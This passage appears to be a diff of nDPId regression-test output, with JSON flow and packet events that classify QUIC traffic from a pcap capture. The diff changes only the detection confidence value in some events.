00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1621495335381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495335381,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFetAAH4RYBGokEAFgPgYAemJAbsFTnpTy\/8AAB0IqORxJIJl5AcANwCt8wk1cWTApsLKg0qFIIeFQdL8SjnJ21Nj9C4ozIKEt\/+wUZf6f1dPuOm0h1m6yoEiECIbZZdE\/WQnpsKHgdsGaR5qXSnOzRKlmZEms2BJMUJ1gJU+1vqiiTqSMdYTSeQg70VBUuM+3x9Wsw2E03o+Z1GMG+25\/n6NwMjxWm+gXFY1NRlTMkV3W5wOYWyWtaUEJ1GuxnVEaMGpdzPW1AV77AHNHDn1TnbAucEKPzy2Z7cXCuzDt\/9H7U8VZWCbuaotZkdM07nzYkghQ2qDyvNpXGhSNUL7bHDAX3gyAQajMLIOzoUKNAKYaqvN115jAWJ17Leuno6gulXzhvDTc6h49GuoiUQ8KI+Xu59zdoInlbDcFVAjf1jbarKGcwBIepEYbQYRji12orl2Cd2J\/1+Bw0w1aY5+A4\/nXR8NpyrOqilQzMZ\/djaKFpDp2wQtkiivyepGkDCNsqJWpv3Mpp16MQWh3knQKrxErpfqX6AvVazEihxnMQ4\/lZQJF85G6i5\/hhqxRgpLlfxqf8yDAXnP41Vs+9APNn2BuhKubR4aoRulNYKJMq1HmrxFJkWYPmROIqVMuTJ5gGI14OGVc0hdb1JAS5T9H6PUnfDQ4xy0WRLpNbJg4pHooWK\/poGpYPpx9oWdXpFju2U2aLPXQHaalwlFujvwO+z5Kp3CS87EGXs0ZDZDKSALKh0LVBiIak00fb11rcVbdm+DMJDj4QQFBjyVXvYpD\/s3UWsVChEZkFE3nedCDj7vh+5c4gCp05wL1CyNlvX0yC9nZNrd9PEWwozxtSS7auEid+pYxl09QHK5t1svYOMpxEDTebjdq4hAcn\/6xmLg313Z5mnqQGjc1IbzLZAaSMXJYCkfIC83JKqjSEnj4IL1MdqJxOx6HDNp9YD7d6\/\/f8\/wL9ELZHhINgHddlPCKvb86VVYNVvmKys1qBiqdarfutbDcX5q7MbS59s0zBaWxPuzIpu\/\/y4WbjIRgu2TWCnWJSdPC7Qjc2fNbgvcjVvEkTgtAb+pWGsml8538kvECQrljr246X7pAeQ6Rl328xa0txA2awkdTR2Wk\/07SZvUhvNVrpZHNN\/uBdVi\/gqFbPaQtmNYr7ccvsLKKUtd3trzmLlGJjqZrAGduvrEEW9NJT5bIWNvWFv4br5yveMnNX4bpaDG1haMmzx7U6OlmM3KOomrvbRevEeZKz4OYXdrS0x7AiJn3cxU8ZV6t2UtyD2rRiXkxP0GH0SMLlUVrIeDAeXS61FKsQViw4KbhZuYC7JG35I7aDnBvJpT2cojLKnh8D22UVQUC7YIz+L+JkQfLKHmScUY4befIcVYhsE4zFKdj4FbcDDZssysQxUIzWPXjqO85RbZkVhwJZ6QcDMA\/InscSDocIji+mME\/SdF8AIFHFhYqcxF3XJEkr1XiAnrNSjsZrdhd8QomNgx9\/Jva6PaDsTSQtI7y2LQGeZPv7cqaxw
KiK0J7JoDrx9arAHuWtQe5bt86Bh81MG6c3EsNnsRmoWdIC6JrwhXNPDY0QTlJMC8ody4xB5guQa259jQwXtYVl6cLF2RxeWEY2NqprP1yX7UldI23tFbTyJMb\/AcwD1vmzT28UF\/oSbC\/3S38SJgbg9+aEbmVFuD944Pv50FJTPzleYonVC5A2YOH0x1NO5XI3iKQM6C\/1v4Lh1wCMNgPJK1VF9Fhh0Ta+l9iAqD9rEm\/DoiFxRwcYyligkxTdm1h3T4\/oYT\/Z8Mgvo1yu23DDNKFJAsZXZlSE0AuNsh5V+\/sk2BjDwu"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335383,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1621495335383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495335383,"pkt":"AAAAAAAAAAEAU0VlCABFAAViNPhAAH4RJE2okEAFmWIcTue\/AbsFTvGexv8AAB0IOo3jhsRNjQEANwBHxNQXfZgQnNGpal0okl9ccuiV6Xx1VVVSOoSDjFN\/WqaQd3bf4jLTMfe18yDQYl1ksGsIMjJE\/X+k1eq0cqPlOyX+nVZA3CKUBe+I06Q01b7sXmYYhr0WJT3kaR9mro469WK6gpT7T4TFYwMpIrtaDA6muvL250OHHrKx2t\/b3j+rVBhRdyz83flQDLS5iJyeiPX3ozrRQ8ufwzIu7VjaOgPDLFPf9CLW6Ex0JWr6LOuOaf71I4Deuwp47CbRSo1v1DJgKlHv23GjLnkhuFaey4\/n8OHVzpyX5hGwEHk01EXAy2I\/0t6k5RU07Rm\/9iC1+Anc0an6X\/5En\/QcUFXIDKQQ0Thy7dKi6TNSrUp6a1tBrt6NwQ27tW\/1KPud11aAq4HGehTpL4HrcEZJ6WRfhBzyOJR5FMA0B\/aet9V93fh5IdqLX+OC3ZB1nATGbkICNniKaUV89lf8n83peKZ0ObXe1ZxWdkVdcZU3LEFcVpo1RTuE1L7x8jQcdWDYcvdEn1Te8UHdP7yraROFUsioeAfpcF778rK+5okAR+2XHHnSdnOHlohFWI1nH1SREZrVHh7JRhDyl8Ucr\/BgNlTDtZwOhLvHQrKA
KbHZNh+Yop6avCoxdZcyMauux9VIsx1V6ZcFLgXOdrsIQBCslYzV1nQT77qZUFP5pFFJi6yKZK6JqNzTNo4XAtE\/EmrXjIctL0spz7CUAko8ZCx\/QlZojgyY6l8\/mF\/t0GdVlTfXrBS8k9H2GgvfGIItBGDd7oEIXE8\/x7XEay01BVjgSd+i\/fFLDpHQ80ZkWzpHV3HT72SAoHktM64YPvjZEUI1hUeWmJuYJPomtO+bUx7kO\/d90sGY0xqsv2HBsIxKXVokT0NpQb4HQ\/\/6\/ISGzQgrUOpdVkOQ4Ov2jxibQpg6Vu4ywzr3gBFjvKwX+cgOdNrtcrtCO\/z+jSIIOWVj3BibuGPE9poYNEM8A3bcrqLJXyc3G89K4CYVPfqcyne8lrvC0IGJ1zrYdFUx3gECn4opv\/gdQJXtuOTrUVmH71S5XqG9H0DBG\/sLfb5rsQm+LQOFMiN+jrhKPRrA402Fu4L9OwLTll3iaAH2TP4qDHpL4lAHSm08OEvyaElT80VWlv2GLl35bqH2Y39bpMCq7CkCZv3UgOh3l\/9+mPbAjeGFb00aqhN2vkH0TkgWXcwcZksbOsM+yV8OhtptiXBR4EU\/g0BqPYUf\/i17kayR5JWkci2qp+nf5YWFnxyDprRblGELorjZFQUlksU2RdG4SN1MF4A1eeKjPZlM0HL1zDrMIwtALb02IzmQZ\/Bm\/WUiUYaKyLJwcs2ZwEM2kLSrZp8uJyNf5M3uLoVEDHlKNLba7DN1ef+MMOa7CGGrjpqpw0sZPT5ONzbaAHLUCfOebBzKE9NIEP7C8UHDBrcv6G5CW3oNLes3+0POLAa4kPIRIBua7JjztiSUYQh2RHd4OJOvzA71BVztSPvZl673nw7XzMsbdr5yRgpPAO5OfmfVTBLj873AmjrBo38xLoYPXshplGzi0ikFEynS07HFKA5UOZGq85zAFFcWI5HWixUpkCsAvcwId0fp1BUC9FDRIAhfc\/\/KaShDxhdYfYHSMEK9PXtdq234Pe7ioWnm11vuwdmo3GVpj2tG8uaQQ7pQ4Hvyo2VkgXgRXCH7WUw5XTIbb2ts1zddx2Lh9L2HgixwQtoUEyPMYDhKUevyM22X+x0NPUTz8twzls5Hg0qwDa4hANEFshc4a+3VtH8uy6bSdnlQBUo4quCx"} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335383,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; 
Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335383,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335836,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1621495335836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495335836,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+mNAAH4RpI6okEAFJ+NIIPm1AbsFTnliw\/8AAB0I4pZJfic2KdUAAEU0G2\/JHhTaDCySWTsRyHcMkznWFPDz+s6YIbogX+v8zxx769L1qgtkV6CvE8r8hbHRMlJ4aqDQ8cnTd+qnT2W9TfmVMr\/V0QP+6QvVQ48j6rtyLfieLy9\/2EkamXQtFIYCWvvW56wuHj2xCT+50ITw+NRr+y9x0NbAGQWozGRk2nR4BKbEsfWPX5\/wqL6hTsunv94vRDKt7EutCZye28TD9oEZAHOg1MaC1b7h0oQC5kjkApzmv08jnPKI9H9f4j\/JQA77vXtBo3U2wrGwehzISa+gzg27eFe0Lz6CL6yGLEsunuBNCJshBMKrp+ijV2rgvg5UQp7dgHCW\/1wu0moHCOx1d9YiEenWAscqFZzCaENXUAI0EuPYxVrNWL604hKBfbSm6P27VV+gA1ELL9R5AQqvLOn6Gmh7AwXHx1PjRRS9ZZeTZzDOrOpcAi0CggBnKIRIsKE94hUybka\/wHV\/UX8z+55FNlySolQCpZKIkqpC+g\/oYQng3hV51VM7kvO5KqfG5HLUVXPscZuabo1fXFu0wfR+YOWFQmXwAeKLw4wbgsr8gSevv1IhYdTeWBQ3qCSH2Tppj2OqfrOoirytq5pj3XRErAqPiCY9F2o1yNDW1fTSxLigm4qy3VUHhT8BbSneM9jhuRSjXUwtUVQiTkh9fIe5kcjtRbujl3+qnTQpnqGD\/TlHOvndYb4rgexjVKSDC4knc0rUty5gi9WhVovaDbmyNsugebY2WME6BJA8Lu8NcnSunCdew311rjHn1f8ncvLm+i\/OY1PB6SImyOzhch6rbP\/IjlcVBQcR+URjxzQhNnom+dzvRHE5cIEiL+1dwZRuOOr7bNmFIX1287mpzg7yqBscxlRDWH0ocb2H4WsfiWBFpKFARkSseaSsa2eVQAIL2m1eD6Q5t6gvJ\/yS9s8El8JwzhGisbnzry5Xy1K6Eg04XDT1lI9sdOVzonqquNY+LbcWO481trrWSpCApp5pm2FmvuVNAEDcE\/leVs7Upo9W3dNaKtj2RQTYCO\/pqhTPVqYf0nCLrPcAqiD+9T41XijcawBR\/vbqo1tZ4KEM0cmR5k1AUaoIZ3+Bzv6PH6Hce0+kR7CW4Ep2f9lzdo1J22p1axhl4ULPWrGGIQfQXq+n5fOWuwREvJQKtwN0C6+WJUfpd91g1CybKUv8MFVhdUf8Z9tfVjfisE3C9rOjB0k0MjLYkNVv+k18kjbqvZJa1J5DuEtyRwEzwZz267jAgfJf\/XgiOr9BkO\/0aR6plCQdvxTD0K6L19vGxNUgCvzjD4L4h8+noYGT953s8stid+4KJgAdsiOqOYzNzPEmgyvvlweAy2zeSHFiyyWUyyy76HG\/MQrVwaXXVfHNGbKhxR9W0ukaLCsoX3onBUGpohxenfTJlZzKL8f6xYrqmYbQV\/2yxhBOtahomZm56JtJZH9kbZ6pFHt4JM3e21Q9rm\/tDp6i9hxJH
Fb0VyAuvq537RsbPY1kLQWWEsQCs2Tt3Wk40kzGVdrjq3\/r0EUSSt9U+OnMb23TZeuTw1MquX\/yStzFhFP9JcbwXaoADfNoJC+bQLJ8c6WKIjeXyYcAg7kfdAZVh\/F91xeHHcxgWSpMK9hXHHSBSPCeVl1GoIV7g3PihVhaG2LZCuQE7\/iMdk6e2iUIg8fQ54B2ysh5qBAxEKabZxJZaJfM0WbgXRn3GIisLwUCj8Xw6xgKVQ2XrDNV1619IuEcLLz0LdB+5Ys9lRCOKjjsDK7YhqYsH3VOXEGIEM1hAddYg5zeKKiO"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335836,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons2.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335836,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"beacons2.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1621495372662,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495372662,"pkt":"AAAAAAAAAAEASYHhCABFAAViK7hAAH4RUtKokEAFZ7MouMMGAbsFTkcuwP8AAB0IxZqmm6+AGC8AAEU0bV1phXsNBAyduWQMMwC6OLQYyTAN1FxuQVMaii5rW8BXPGS0FRwk8HrnF9xMFnBPXfvvEo3QBMM3FudHvdk8cEb+Bo8BomOBxFWNxcTXQHnGOYwDJRX3D+VGcXzFwUoYmTqIRQkkUg\/RXDgv4zX29xNTFSJZ2g4nrk8eulw5HhkFc7yauYf\/ApGm95lgsQ1j+7m8PBWklTsQX6hwGdXDIAv02+sMBfhTQchd1a3DETCVvIEvB3zgW19rHL3EGi1JVlsZU4n\/sCu9BlSoqz1gNiX5dZptoecFN1AbSN0j+aDykV86bt8EAW+l7neIOdiEUtSDvZYs0HOSy8d81eka84F4E25AyCh5Jh4qKAUrTwyky1QcKLkyUsb52v0nNZPnkgfOerwlcB6TuTptQskR2whmUpX7JY7NpYzoP+bSiNZixNyHKsy66zeLu36e+mO9OULTXh1nTVJ5nWB3uSmA7NhWQQFE4WUtBQikelX5MZz8WH2ysNSrIGAoo\/2bMBVU0RtpogNGg7hQ5yCYCS9ewZ13uOeB7XptgaMPF1gNLsQtCfhFk6ef\/IGD3LoSbvbOc0HYo+mifMuhyLvoKbzbavtQTxjr\/BN8j3ypDUZ
BjhEh438y6mmn1f7adohk5c+uxUd8mwi+IBpv8HBmXQY5puUsZypJHNztPV6aJIh6Up0rlLSwWVKrIC8xNAsiNPMAwoGGx\/XVMBulOOZ6hs\/RBHhwegaA+qv64ubbFEADxru3Zq7D\/YYhDD4KHX9f7DbtYtgURUiA6xsJhOOXb3ciQi\/vZzxt6Mh24fTbT1zp6Pmg1q7vP4jIWXIVFXNJCE7CuU9s2seo56SppSuh\/r28+L9mCauWVe2519clc0WesPZGyQOFWVJGUBtGpU8MBYk2YAmeOz2CyqlNn3SdiKTur+zOdGO8ie8klvK7F8QEXDrzQjkWCs8ClQh4UCknNZJa8gpVH4lz8rVeTWyHJza3U1f938XY4whWDpXVkRb2tmvmX1IQF+lQXiMyPE4Unt5vxehyMhS6SLraGYucF6p4h8DCTwkmMnGAS9zwcIT6fW4iTimSLnell1BouaNm3iu0jMNHt2e7LduTiCHwMdWuN6hrjN3aybR6Fj8+ydHkiW93NhFq4rHV3Lc1p0x3e5C1G7Q1KN7isNa\/PRXQczMknABRwlF6fpe6AEEGLlIHjMRGWiSRuK055l\/W1Z5Stz3MgFh+r2imHY4KtoaqO3nmH\/uARGwbFDlT2KtdiBjpaphwsWP6UUNd7tej\/yMGpMNK9JtLMNN7QuwlAvbHLOiDSWu26o0hPm2y6s1kOsNgLW+xn4Vjz7Mz9pfDGHMKpfWIdOZkZ+CUIuGSOeGdxsohrmhXBJ3bEy8ojcL77VhzUqJFSXK3Sf3c1W\/sHBP6HAEV0vYyCWRBfB7RxHZMrq\/EctwoWwOWHOSW+AMSYdLUpbxBV6SLqMAz1UrzSOJ6gRrQidZGXlFTz1kRh+RMKPYHu3oX663ubZ0C3ijx6BnA7L4hpNSWGrcxv53ZUCUkQA7FCWH\/TtcdnTCACzr0u9NEpwAgUC2LlBqHsWix60mIR+jumXfV+1Q+xHwPIy7vySfL2wpvF5qrjTomfEAnUqayNm+QdT1vJhoJyiVlkGVLNP1q5tkX2MdpGs8WF5iStIN2keOB+bcodYn5zmDhSw278mjC+eLZaIRMC0i0\/X+TsinvcSe7w39bNxE5H8w556PjcUlXwNHYH8Zthv+GodkuVXIFYZUQVL\/D1GXp+I7OLMvHEr6e"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r5---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows 
NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r5---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495373983,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1621495373983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495373983,"pkt":"AAAAAAAAAAEAguyCCABFAAViV+9AAH4RzFOokEAFdZR1HtxAAbsFTibcwv8AAB0I75EoiW8nS2MAAEU0WdJTtqNtt8MG+zLwh\/UU3FC0zniGr+PwIYUTXnhvS3bBdoRiWOeQ6UKjsBPDLjzDF8dFmOoLoxM9+m6lJwiTWxBqM9JUROj0mguvgkrLqNleDSC7iL4hCrMFjunTfX143sRFPit0bAYIzwvgUuwziEoLnaNvtvkGhiSGOZBzuMVKjTdQ3xkwHQprnY0xWrgmo5nbvHjVfWNFH\/cNC6CCbHqicnUmFRKcm3GMda\/4MP3KAIT+eLw69zCa9uvIEzvXVRl3WvkyZ33qNGuVD+ZvXm9w23J53\/4rlJ3V4StfZ\/Gc4auuB1eSwLog30QSMnyjUcNeP2ibhvLh5O9C35kjOeF\/aDhH1pEcJyXVmWp2G68qb90M\/uLiMTEotX538dX2dgaJ8rTyVlafTtMntoi6sOfMJJIEXEELAkMd2DlCsTy2VQD3iHqC0iVc1r1aw72L8yAQx1n5XURSMoIPLN2keObRP7lr6WcPJ6IMB39kTrMiBZ08mgOSU4GO1bvLA97jrgIr2nR\/Gj8wpcCcF3CPGlyDolBI9IH5a9k9R8RAIrgIzGkXnS9L6V8Nx0Bh6hPBxQnczqK5QuOqW\/vH9tfepppWUj5CKgAm1D02Fq0vKwjtMqpw6ZpAMihlJy9GCI2fNnxnQBbKEz6V\/so8\/ex8K+F2VV8Xlyk+BTFA4OPjxuQ6LZAw3MP6P3hxfm\/8ljkop5\/SI5xDRLcIAhlRNjSOdekQz1mIEo2EnDfSaSb7Gh75g3Y7WAgPEF6enaKqdFVGutsJVL+sNhw8qX0fBTToiOiB9CtWfJJRB1ff5ir4HCC5YgaG7Iny5R+T9zRuNyBNfZ4NPpiM+4EzimASiGJobUimGvk4GeUDE7fXrp72sRKhQCaH5\/nbha+9DmZgdr9mXrl2